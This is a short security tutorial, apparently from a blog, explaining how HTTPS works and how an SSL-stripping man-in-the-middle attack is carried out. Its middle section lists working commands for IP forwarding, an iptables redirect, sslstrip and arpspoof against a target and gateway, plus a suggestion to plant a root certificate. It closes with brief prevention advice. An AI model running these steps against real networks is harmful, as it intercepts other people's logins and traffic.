• Animesh Gupta

Man-in-the-Middle Attack on SSL



HTTP vs HTTPS?


Instead of HyperText Transfer Protocol (HTTP), this website uses HyperText Transfer Protocol Secure (HTTPS). Using HTTPS, the computers agree on a "code"between them, and then they scramble the messages using that "code" so that no one in between can read them. This keeps your information safe from hackers.





How SSL Works?



A browser or server attempts to connect to a website (i.e. a web server) secured with SSL.

The browser/server requests that the web server identify itself.The web server sends the browser/server a copy of its SSL certificate.

The browser/server checks to see whether or not it trusts the SSL certificate. If so, it sends a message to the web server.

The web server sends back a digitally signed acknowledgement to start an SSL encrypted session.Encrypted data is shared between the browser/server and the web server.


Common SSL Misconceptions


HTTPS means I am secure right?


What about…

−SSL version 2.0 flaws

−Weak Ciphers < 128 bit

−Certificate keys < 1024 bits

−Client vulnerabilities

−Server vulnerabilities

−Application vulnerabilities


SSL can provide a false sense of security


SSL SPOOFING


Common HTTP/HTTPS Connection



Hijacking Communications




Using SSL Strip


1. Get sslstrip


A. Download and install sslstrip and arpspoof (linux only)


http://www.thoughtcrime.org/software.html  http://sourceforge.net/projects/arpspoof/


B. Get Kali Linux


https://www.kali.org/downloads/


Using sslstrip


2. Configure attack machine for IP forwarding.


echo “1” > /proc/sys/net/ipv4/ip_forward


3. Route all HTTP traffic to sslstrip.


iptables –t nat –A PREROUTING –p tcp --destination-port 80 –j REDIRECT --to-port 54321


4. Run sslstrip.


sslstrip –l 54321


5. Configure ARP spoofing.


arpspoof –i eth0 –t <targetIP> <gatewayIP>


6. Launch a sniffer and collect data.


https://www.wireshark.org/


Expanding the attack


What if a root certificate could be installed on the target?


The attacker could potentially replace the certificate and maintain a secure connection.


Preventing SSL Spoofing


  1. Ensure you are using secure connections. Look for the HTTPS.

  2. Be careful about where you use secure sites.

  3. Secure machines on the network.

  4. Use static ARP tables.*

Normal




Stripped




©2019 Security Unleashed | New Delhi